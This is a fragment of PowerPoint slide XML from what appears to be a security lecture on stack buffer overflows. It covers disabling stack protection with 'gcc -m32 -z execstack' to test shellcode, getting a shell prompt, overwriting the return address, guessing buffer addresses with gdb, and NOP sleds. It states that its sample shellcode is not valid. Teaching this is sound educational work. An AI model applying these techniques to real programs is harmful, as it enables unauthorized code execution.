            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shell</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shell=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</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shell</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test_shellcode.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-4.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Note: This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is not valid, you will have to make your own!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69654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5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5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5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57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57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57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57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579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579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579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579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579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US" dirty="0" smtClean="0"/>
              <a:t>Jumping to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In order to jump to the shell code we need to overflow a target buffer with a string that contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The address of the shell code repeatedly </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7361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902" name="Rectangle 14" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="3200400"/>
            <a:ext cx="4038600" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wave">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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549890" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jumping to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549892" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3200400"/>
            <a:ext cx="29718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49893" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="3200400"/>
            <a:ext cx="7620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49894" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="3200400"/>
            <a:ext cx="7620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49895" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="3200400"/>
            <a:ext cx="28194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latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549896" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2270126" y="2768204"/>
            <a:ext cx="802661" cy="369332"/>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Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549897" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191001" y="2800350"/>
            <a:ext cx="466794" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>BP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549898" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800602" y="2800350"/>
            <a:ext cx="620683"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RET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549899" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791201" y="2800350"/>
            <a:ext cx="870751"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Stack...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549901" name="Rectangle 13" descr="Horizontal brick"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3200400"/>
            <a:ext cx="1905000" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="horzBrick">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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549903" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4114800"/>
            <a:ext cx="5943600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549904" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581401" y="4114800"/>
            <a:ext cx="1341646"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Long String</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549906" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1066800" y="3829050"/>
            <a:ext cx="0" cy="28575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49907" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010400" y="3886200"/>
            <a:ext cx="0" cy="228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18" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="140980" y="2768204"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7702580" y="2656047"/>
            <a:ext cx="1441420" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10414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99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99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99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99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99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9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902" grpId="0" animBg="1"/>
      <p:bldP spid="549901" grpId="0" animBg="1"/>
      <p:bldP spid="549903" grpId="0" animBg="1"/>
      <p:bldP spid="549904" grpId="0"/>
      <p:bldP spid="549906" grpId="0" animBg="1"/>
      <p:bldP spid="549907"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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Guessing the Buffer Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548869" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In most cases the address of the buffer is not known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It has to be “guessed” (and the guess must be VERY precise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The stack address of a program can be obtained by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assumption: No stack randomization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Given the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>same environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and knowing the size of command-line parameters, the address of the stack can be roughly guessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We also have to guess the offset of the buffer with respect to the stack pointer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56427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8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88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88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88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886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886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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NOP Sled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550915" name="Rectangle 3" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="4400550"/>
            <a:ext cx="3276600" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wave">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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Almost the buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550916" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4400550"/>
            <a:ext cx="29718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50917" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="4400550"/>
            <a:ext cx="7620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50918" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="4400550"/>
            <a:ext cx="7620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50919" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4400550"/>
            <a:ext cx="28194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50920" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2270126" y="3968353"/>
            <a:ext cx="802661"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Buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550921" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191001" y="4000500"/>
            <a:ext cx="456638"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FP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550922" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800602" y="4000500"/>
            <a:ext cx="620683"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RET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550923" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791201" y="4000500"/>
            <a:ext cx="870751"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Stack...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550924" name="Rectangle 12" descr="Horizontal brick"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4400550"/>
            <a:ext cx="1905000" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="horzBrick">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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550925" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5314950"/>
            <a:ext cx="5943600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550926" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581401" y="5314950"/>
            <a:ext cx="1341646" cy="369332"/>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Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Long String</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550927" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1066800" y="5029200"/>
            <a:ext cx="0" cy="28575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28" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010400" y="5086350"/>
            <a:ext cx="0" cy="228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29" name="Rectangle 17" descr="5%"/>
          <p:cNvSpPr>
